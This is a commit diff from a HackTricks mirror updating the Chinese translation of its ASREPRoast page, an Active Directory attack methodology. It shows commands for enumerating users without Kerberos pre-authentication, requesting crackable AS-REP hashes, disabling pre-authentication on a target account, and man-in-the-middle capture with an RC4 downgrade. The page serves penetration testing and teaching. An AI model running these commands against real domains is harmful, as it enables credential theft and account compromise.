maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/windows-hardening/active-directory-methodology/asreproa

Browse Source
This commit is contained in:
Translator 2025-03-21 08:59:34 +00:00
parent 1f0ad856fa
commit 3303f708c7
1 changed files with 9 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
src/windows-hardening/active-directory-methodology/asreproast.md
View File

@ -4,13 +4,13 @@
## ASREPRoast
ASREPRoast 是一种安全攻击,利用缺乏 **Kerberos 预身份验证所需属性** 的用户。基本上,这个漏洞允许攻击者向域控制器 (DC) 请求用户的身份验证而无需用户的密码。然后DC 用用户的密码派生密钥加密消息进行响应,攻击者可以尝试离线破解以发现用户的密码。
ASREPRoast是一种安全攻击利用缺乏**Kerberos预身份验证所需属性**的用户。基本上,这个漏洞允许攻击者向域控制器DC请求用户的身份验证而无需用户的密码。然后DC会用用户的密码派生密钥加密的消息进行响应,攻击者可以尝试离线破解以发现用户的密码。
此攻击的主要要求是:
- **缺乏 Kerberos 预身份验证**:目标用户必须未启用此安全功能。
- **连接到域控制器 (DC)**:攻击者需要访问 DC 以发送请求并接收加密消息。
- **可选的域账户**:拥有域账户可以让攻击者通过 LDAP 查询更有效地识别易受攻击的用户。没有这样的账户,攻击者必须猜测用户名。
- **缺乏Kerberos预身份验证**:目标用户必须未启用此安全功能。
- **连接到域控制器DC**攻击者需要访问DC以发送请求并接收加密消息。
- **可选的域账户**拥有域账户可以让攻击者通过LDAP查询更有效地识别易受攻击的用户。没有这样的账户攻击者必须猜测用户名。
#### 枚举易受攻击的用户(需要域凭据)
```bash:Using Windows
@ -33,7 +33,7 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
```
> [!WARNING]
> 使用 Rubeus 进行 AS-REP Roasting 将生成一个 4768加密类型为 0x17预身份验证类型为 0。
> AS-REP Roasting with Rubeus 将生成一个 4768加密类型为 0x17预认证类型为 0。
### 破解
```bash
@ -48,12 +48,12 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
```
```bash:Using Linux
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH 'target_user'
```
## 无凭证的ASREProast
## ASREProast 无需凭证
攻击者可以利用中间人位置捕获AS-REP数据包因为它们在网络中传输而不依赖于Kerberos预身份验证被禁用。因此它适用于VLAN上的所有用户。\
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) 允许我们这样做。此外该工具通过更改Kerberos协商强制客户端工作站使用RC4。
攻击者可以利用中间人位置捕获 AS-REP 数据包,因为它们在网络中传输时不依赖于 Kerberos 预身份验证被禁用。因此,它适用于 VLAN 上的所有用户。\
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) 允许我们这样做。此外,该工具通过更改 Kerberos 协商强制客户端工作站使用 RC4。
```bash
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP